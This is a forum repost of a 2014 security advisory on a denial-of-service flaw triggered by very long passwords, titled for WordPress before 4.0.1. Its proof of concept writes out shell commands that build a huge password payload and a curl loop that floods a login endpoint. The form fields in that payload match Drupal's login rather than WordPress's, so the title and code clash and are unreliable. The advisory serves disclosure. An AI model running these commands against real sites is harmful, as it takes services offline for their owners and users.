Jump to content
LLegoLLaS

Wordpress < 4.0.1 - Denial of Service 2014-12-01

By LLegoLLaS, in Stiri securitate

Recommended Posts

LLegoLLaS Rookie

LLegoLLaS

Posted
Posted (edited) 


====================================================================
DESCRIPTION:
====================================================================
A vulnerability present in Wordpress < 4.0.1 allows an
attacker to send specially crafted requests resulting in CPU and memory
exhaustion. This may lead to the site becoming unavailable or
unresponsive (denial of service).

====================================================================
Time Line:
====================================================================

November 20, 2014 - A Wordpress security update and the security
advisory is published.

====================================================================
Proof of Concept:
====================================================================
Generate a pyaload and try with a valid user:

echo -n "name=admin&pass=" > valid_user_payload && printf "%s"
{1..1000000} >> valid_user_payload && echo -n "&op=Log
in&form_id=user_login" >> valid_user_payload

Perform a Dos with a valid user:

for i in `seq 1 150`; do (curl --data  @valid_user_payload
[url]http://yoursite/wordpress/?q=user[/url] --silent > /dev/null &); sleep 0.5; done

====================================================================
Authors:
====================================================================

-- Javer Nieto -- [url=http://www.behindthefirewalls.com]Hacking while you're asleep[/url]
-- Andres Rojas -- [url=http://www.devconsole.info]# /dev/console | "In the beginning … Was the command line" (Neal Stephenson)[/url]

====================================================================
References:
====================================================================

* [url]https://wordpress.org/news/2014/11/wordpress-4-0-1/[/url]

* [url]https://www.drupal.org/SA-CORE-2014-006[/url]

*
[url=http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html]Wordpress Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep[/url]

*
[url=http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html]Drupal Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep[/url]

* [url=http://www.devconsole.info/?p=1050]Timing Attack and the importance of controlling the length of the input – The Case of Drupal CVE-2014-9016. | # /dev/console[/url]

sursa;bugsearch.net

Edited by LLegoLLaS

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...